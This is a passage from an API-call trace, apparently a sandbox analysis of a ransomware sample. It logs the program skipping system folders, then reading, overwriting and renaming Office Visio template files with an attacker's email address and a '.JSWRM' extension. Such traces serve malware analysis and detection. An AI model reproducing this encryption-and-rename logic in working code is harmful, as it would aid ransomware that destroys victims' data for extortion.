(lpString1="EESYS_M.VSTX", lpString2="..") returned 1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="...") returned 1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="windows") returned -1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="recovery") returned -1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="perflogs") returned -1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="documents and settings") returned 1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="system volume information") returned -1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2="msocache") returned -1 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESYS_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESYS_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.355] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15661) returned 1 [0148.355] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.356] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3d20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3d20, lpOverlapped=0x0) returned 1 [0148.588] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.588] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3d20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3d20, lpOverlapped=0x0) returned 1 [0148.588] CloseHandle (hObject=0x314) returned 1 [0148.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.591] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4ade205, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4ade205, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4ade205, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3b6d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESYS_U.VSTX", cAlternateFileName="EESYS_~2.VST")) returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2=".") returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="..") returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="...") returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="windows") returned -1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="recovery") returned -1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="perflogs") returned -1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="documents and settings") returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="system volume information") returned -1 [0148.591] lstrcmpiW (lpString1="EESYS_U.VSTX", lpString2="msocache") returned -1 [0148.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0148.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESYS_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0148.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0148.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESYS_U.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESYS_U.VSTX", lpUsedDefaultChar=0x0) returned 12 [0148.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.594] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15213) returned 1 [0148.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.594] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3b60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3b60, lpOverlapped=0x0) returned 1 [0148.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.601] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3b60, lpOverlapped=0x0) returned 1 [0148.601] CloseHandle (hObject=0x314) returned 1 [0148.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESYS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesys_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.603] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381796f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x381796f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x381796f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12491, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETCOM_M.VSSX", cAlternateFileName="EETCOM~2.VSS")) returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2=".") returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="..") returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="...") returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="windows") returned -1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="recovery") returned -1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="perflogs") returned -1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="documents and settings") returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="system volume information") returned -1 [0148.603] lstrcmpiW (lpString1="EETCOM_M.VSSX", lpString2="msocache") returned -1 [0148.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETCOM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETCOM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.605] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=74897) returned 1 [0148.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.606] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12490, lpOverlapped=0x0) returned 1 [0148.614] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.614] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12490, lpOverlapped=0x0) returned 1 [0148.615] CloseHandle (hObject=0x314) returned 1 [0148.615] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.616] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1729263, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1729263, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18ccc9d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x112f5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETCOM_U.VSSX", cAlternateFileName="EETCOM~1.VSS")) returned 1 [0148.616] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2=".") returned 1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="..") returned 1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="...") returned 1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="windows") returned -1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="recovery") returned -1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="perflogs") returned -1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="documents and settings") returned 1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="system volume information") returned -1 [0148.617] lstrcmpiW (lpString1="EETCOM_U.VSSX", lpString2="msocache") returned -1 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETCOM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETCOM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETCOM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.618] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=70389) returned 1 [0148.618] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.619] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x112f0, lpOverlapped=0x0) returned 1 [0148.625] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.625] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x112f0, lpOverlapped=0x0) returned 1 [0148.626] CloseHandle (hObject=0x314) returned 1 [0148.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETCOM_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eetcom_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.627] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x30ca74c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x30ca74c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x30ca74c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15e4c, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETERM_M.VSSX", cAlternateFileName="EETERM~1.VSS")) returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2=".") returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="..") returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="...") returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="windows") returned -1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="recovery") returned -1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="perflogs") returned -1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="documents and settings") returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="system volume information") returned -1 [0148.627] lstrcmpiW (lpString1="EETERM_M.VSSX", lpString2="msocache") returned -1 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETERM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETERM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.628] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=89676) returned 1 [0148.628] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.629] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15e40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15e40, lpOverlapped=0x0) returned 1 [0148.689] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.689] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15e40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15e40, lpOverlapped=0x0) returned 1 [0148.690] CloseHandle (hObject=0x314) returned 1 [0148.691] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EETERM_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeterm_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.696] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x38b0397, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x38b0397, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x38b0397, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14f94, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EETERM_U.VSSX", cAlternateFileName="EETERM~2.VSS")) returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2=".") returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="..") returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="...") returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="windows") returned -1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="recovery") returned -1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="perflogs") returned -1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="documents and settings") returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="system volume information") returned -1 [0148.696] lstrcmpiW (lpString1="EETERM_U.VSSX", lpString2="msocache") returned -1 [0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EETERM_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EETERM_U.VSSX", lpUsedDefaultChar=0x0) returned 13 